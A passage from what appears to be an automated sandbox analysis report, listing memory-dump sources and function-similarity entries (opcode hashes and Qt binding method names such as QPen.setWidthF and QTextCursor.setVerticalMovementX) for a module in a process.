                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FromLongLong_Unsigned
                                                                                                                                                                                                                • String ID: QRgba64$alpha8$alpha8(self) -> int
                                                                                                                                                                                                                • API String ID: 3417993445-961599035
                                                                                                                                                                                                                • Opcode ID: aac0bc655afed459fb16aeea36ec343fdf84825c6be5f24e33ac063a2613fd69
                                                                                                                                                                                                                • Instruction ID: 86ca9e5394f58a1750ab7332871aa6078cce5d69ec2dea520cf20f35bb50d5ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aac0bc655afed459fb16aeea36ec343fdf84825c6be5f24e33ac063a2613fd69
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03018C72B08A86C1EB108F74D8582B937A8FB40B45F9141B6DE5D43360CF7CD59AC380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setPen@@Width
                                                                                                                                                                                                                • String ID: QPen$setWidthF$setWidthF(self, width: float)
                                                                                                                                                                                                                • API String ID: 2145825199-1341275970
                                                                                                                                                                                                                • Opcode ID: b7179538e9308bb4ce11c5954b3da8277bab5269a9b1c57973eaca5b148037b9
                                                                                                                                                                                                                • Instruction ID: 5e0c658ca16d78cc340b7f72f002a44b28292a71c823949516a9d991d7340c06
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7179538e9308bb4ce11c5954b3da8277bab5269a9b1c57973eaca5b148037b9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B1115B5A08F56C1EB10DF25E8886A933B8FB45B84FA140B2CA0D43320DF7DD95AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setCurvePainterPathStroker@@Threshold@
                                                                                                                                                                                                                • String ID: QPainterPathStroker$setCurveThreshold$setCurveThreshold(self, threshold: float)
                                                                                                                                                                                                                • API String ID: 2833657433-2098193841
                                                                                                                                                                                                                • Opcode ID: 33f9d4856d68fa5f8b4518d4d65c7244f03354b306cf9c2a75e627ebc6bba4fe
                                                                                                                                                                                                                • Instruction ID: ddf3c7085e395080b0dc7c26911eaa8b06e3dbc66e6dd7189d96949b60aee031
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33f9d4856d68fa5f8b4518d4d65c7244f03354b306cf9c2a75e627ebc6bba4fe
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D11127B5A08E46C1EB60DF20E8886A933B8FB44B84FA240B2CA1D43320DF7DD55AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setAlphaBufferFormat@@Size@Surface
                                                                                                                                                                                                                • String ID: QSurfaceFormat$setAlphaBufferSize$setAlphaBufferSize(self, size: int)
                                                                                                                                                                                                                • API String ID: 3682934702-1963592284
                                                                                                                                                                                                                • Opcode ID: 4c21275f77da6cb3fbcc058cb3f3b7a9d0fde10fea4944c05a0257792545f041
                                                                                                                                                                                                                • Instruction ID: b5420190a8056e15dc1f5c732d15b8ff7dff205edd907b3a5a2989d7fd7e95f4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c21275f77da6cb3fbcc058cb3f3b7a9d0fde10fea4944c05a0257792545f041
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A113CB5A18E57C1EB10DF24E8886A933B9FB48B84F914072CA4D03320DF7DD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?removeColumn@Item@@Standard
                                                                                                                                                                                                                • String ID: QStandardItem$removeColumn$removeColumn(self, column: int)
                                                                                                                                                                                                                • API String ID: 2771442086-3921793217
                                                                                                                                                                                                                • Opcode ID: adcc2b2aeecedbd0562ea63310394f5fce69d6fffcbfbe064dbb5b35cf5d1cd9
                                                                                                                                                                                                                • Instruction ID: b6676a8e234dde296b53bfd1a5a8687fdb42672e8904201ae305eea250cb492f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: adcc2b2aeecedbd0562ea63310394f5fce69d6fffcbfbe064dbb5b35cf5d1cd9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA113CB5A18F56C1EB10DF25E8886A933B8FB48B84F914172CA5D03320CF7DD54AC700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setEffects@Hints@@HoverStyle
                                                                                                                                                                                                                • String ID: QStyleHints$setUseHoverEffects$setUseHoverEffects(self, useHoverEffects: bool)
                                                                                                                                                                                                                • API String ID: 605048413-232271908
                                                                                                                                                                                                                • Opcode ID: db3dc08d6d01fed9d39a4130473fd6da699475ca74a0748ca70893fd6987e409
                                                                                                                                                                                                                • Instruction ID: f44c06ae793d4b1a69c14aec1c5387045e42b196db36013a3667868a8cc016f2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: db3dc08d6d01fed9d39a4130473fd6da699475ca74a0748ca70893fd6987e409
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 221115B5A18E56C1EB10DF21E8886A933A9FB49B88FA141B6CA5D03320DF7DD50AC700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setCellCharFormat@@Span@TableText
                                                                                                                                                                                                                • String ID: QTextCharFormat$setTableCellRowSpan$setTableCellRowSpan(self, atableCellRowSpan: int)
                                                                                                                                                                                                                • API String ID: 3229484481-4206450995
                                                                                                                                                                                                                • Opcode ID: 6dc654285f43effb2b4f718c12fbbe69a9b656c465b54825209b180c8ef7cec5
                                                                                                                                                                                                                • Instruction ID: b42853223627fcdee6c09ade7210c5f78264553a5b52ed7db4e5c36aa0007994
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6dc654285f43effb2b4f718c12fbbe69a9b656c465b54825209b180c8ef7cec5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 441130B5B18E56C1EB10DF20E8886A933B8FB58B84F614172CA4D03320DF7DD55AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setCursor@@MovementTextVertical
                                                                                                                                                                                                                • String ID: QTextCursor$setVerticalMovementX$setVerticalMovementX(self, x: int)
                                                                                                                                                                                                                • API String ID: 2084158599-1590260451
                                                                                                                                                                                                                • Opcode ID: 7e147756e4b8010aa7f5610fd67e8f7a68cb1b8d6024dd53e30f89012841eb1c
                                                                                                                                                                                                                • Instruction ID: c78906308ab1ccdaae22657f1fe95790d76b9d9a9f4bb4318d8407548831d92f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e147756e4b8010aa7f5610fd67e8f7a68cb1b8d6024dd53e30f89012841eb1c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC113CB5B18E56C1EB10DF21E8886A933B8FB48B84F914172CA4C43320CF7DD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
